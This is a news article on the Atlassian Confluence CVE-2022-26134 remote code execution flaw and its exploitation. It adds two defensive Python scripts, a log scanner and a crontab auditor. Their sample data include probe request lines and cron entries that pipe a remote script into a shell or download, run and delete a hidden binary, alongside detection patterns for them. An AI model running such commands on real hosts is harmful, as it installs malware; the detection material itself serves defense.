By Staff Writer.
Australian software giant Atlassian has scrambled to fix a critical unauthenticated remote code execution vulnerability that affects all supported versions of its Confluence Server and Data Center products. Washington, DC-based cyber security firm Volexity discovered the vulnerability early last week.
Officially tagged CVE-2022-26134, the vulnerability potentially allows a malicious actor to install malware remotely or otherwise control the affected device without authentication. This is the second major Confluence vulnerability attackers have exploited in under 12 months.
Volexity uncovered the latest threat while investigating suspicious activity on two Internet-facing web servers belonging to a customer that used Atlassian Confluence Server software. Volexity detected suspicious activity on the hosts, including JSP webshells writing to disk.
The Volexity investigation determined the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. The cybersecurity company was then able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.
Confluence’s popular web-based corporate collaboration software is used by more than 75,000 customers worldwide. Atlassian describes the software as “protected by privacy controls and data encryption, and meet industry-verified compliance standards.”
However, all supported versions of Confluence Server and Data Center are affected by CVE-2022-26134. The fixed Confluence releases (7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1) and Confluence sites accessed via an atlassian.net domain are unaffected.
“Volexity believes the attacker launched a single exploit attempt at each of the Confluence Server systems, which in turn loaded a malicious class file in memory,” says a blog post detailing Volexity’s investigation.
“This allowed the attacker to effectively have a webshell they could interact with through subsequent requests. The benefit of such an attack allowed the attacker to not have to continuously re-exploit the server and to execute commands without writing a backdoor file to disk.”
California-based cybersecurity company Imperva Threat Research has observed over 680,000 attack attempts since June 3, with attack sources coming from nearly four thousand unique IPs (the largest percentage of targets are located in Chile). Imperva adds that payload analysis shows most attacks are scanning attempts to find vulnerable servers. It has also observed attempts to deploy a malicious script and exfiltrate sensitive data.
Imperva says attackers are adopting two primary scanning approaches: invoking the Java Runtime exec function to run the command-line program nslookup against an external server owned by the attacker, or invoking the Confluence GeneralUtil setCookie function to set a unique cookie name and value.
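Both scanning approaches described above leave the invoked Java method names in the request a Confluence front end receives, so a defender can triage web server access logs for them. The following is an added example, not code from the article, Imperva or Atlassian: it parses common-log-format lines, percent-decodes the request (including double-encoded input), flags requests that reference Runtime.exec, nslookup or GeneralUtil.setCookie, and counts hits per source IP. The log lines are constructed for the demo (the request paths are non-functional stand-ins that only carry the indicator strings), and the indicator regexes are assumptions based on the two approaches named in the text.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Indicators derived from the two scanning approaches Imperva describes:
# Java Runtime.exec running nslookup, and GeneralUtil.setCookie.
# The exact regexes are assumptions for this example.
INDICATORS = {
    "java-exec": re.compile(r"getRuntime\s*\(\s*\)\s*\.\s*exec|Runtime\.exec", re.I),
    "nslookup":  re.compile(r"\bnslookup\b", re.I),
    "setcookie": re.compile(r"GeneralUtil\b.*\bsetCookie|setCookie", re.I),
}

# Common log format: ip ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log; the suspicious paths are stand-ins, not real payloads.
SAMPLE_LOG = """\
203.0.113.10 - - [03/Jun/2022:10:01:12 +0000] "GET /login.action HTTP/1.1" 200 5120
203.0.113.10 - - [03/Jun/2022:10:01:13 +0000] "GET /%24%7B...Runtime.exec(%22nslookup%20probe.example.invalid%22)%7D/ HTTP/1.1" 302 0
198.51.100.7 - - [03/Jun/2022:10:05:44 +0000] "GET /%24%7BGeneralUtil.setCookie(%22probe%22,%22probe%22)%7D/ HTTP/1.1" 302 0
192.0.2.33 - - [03/Jun/2022:10:06:01 +0000] "GET /display/DOCS/Home HTTP/1.1" 200 8841
"""


def decode_request(request: str) -> str:
    """Percent-decode repeatedly (max 3 passes) so double-encoded input is normalised."""
    decoded = request
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def classify(line: str):
    """Return a finding dict for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = decode_request(m.group("request"))
    hits = [name for name, rx in INDICATORS.items() if rx.search(req)]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "status": m.group("status"),
        "indicators": hits,
        "request": req,
    }


def scan(lines):
    """Scan log lines; return (findings, hits-per-source-IP counter)."""
    findings = [f for f in (classify(l) for l in lines) if f]
    by_ip = Counter(f["ip"] for f in findings)
    return findings, by_ip


if __name__ == "__main__":
    found, per_ip = scan(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f['time']} {f['ip']} {f['indicators']} {f['request']}")
    print("sources:", dict(per_ip))
```

Run it against a real Confluence reverse-proxy or Tomcat access log by replacing SAMPLE_LOG with the file contents; the per-IP counter is what lets you separate mass scanning from a focused attempt against one host.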
Imperva also notes the malicious script is deployed in one of two ways: gaining persistence by modifying the infected server's crontab, or downloading an executable file, running it, and then deleting it from the file system. The malicious file's goal is to infect the victim server with the Mirai botnet.
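Both deployment paths just described (a modified crontab, and a download-run-delete sequence) can be checked for on the host. The following is an added example, not code from the article or any vendor: it audits crontab content for entries that fetch remote content and pipe it to a shell, or that download, mark executable, run and then remove a file, which is the pattern the text describes. The crontab text and the IP address in it are constructed for the demo, and the patterns are assumptions about how such entries typically look.

```python
import re

# Constructed crontab content for the demo; not from a real incident.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /usr/bin/wget -q -O - http://198.51.100.20/x.sh | /bin/sh
@reboot /usr/bin/curl -s http://198.51.100.20/bin -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x && rm -f /tmp/.x
30 4 * * 1 /usr/bin/apt-get update
"""

# Heuristics (assumptions for this example): a downloader tool, its output
# piped into a shell, a chmod +x ... rm -f chain, and hidden files in tmp dirs.
DOWNLOADER = re.compile(r"\b(wget|curl)\b", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(/bin/)?(ba)?sh\b")
RUN_THEN_DELETE = re.compile(r"chmod\s+\+x\b.*&&.*rm\s+-f", re.I)
HIDDEN_TMP = re.compile(r"/(tmp|dev/shm)/\.")


def audit_crontab(text: str):
    """Return [(line_number, reasons, entry)] for suspicious crontab entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue  # skip blanks and comments
        reasons = []
        if DOWNLOADER.search(entry) and PIPE_TO_SHELL.search(entry):
            reasons.append("download piped to shell")
        if DOWNLOADER.search(entry) and RUN_THEN_DELETE.search(entry):
            reasons.append("download, execute, delete")
        if HIDDEN_TMP.search(entry):
            reasons.append("hidden file under tmp dir")
        if reasons:
            findings.append((lineno, reasons, entry))
    return findings


if __name__ == "__main__":
    for lineno, reasons, entry in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: {', '.join(reasons)}\n    {entry}")
```

On a live host, feed it the output of `crontab -l` for each user (including the Confluence service account) and the contents of /etc/crontab and /etc/cron.d/*; a clean Confluence host should produce no findings.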
The Australian Cyber Security Centre (ACSC) says it is aware of malicious actors successfully exploiting the vulnerability before it became public but remains unaware of any successful exploitation within Australia.
Atlassian has released a fix for versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 of Confluence. They also have a temporary workaround if customers are unable to upgrade immediately.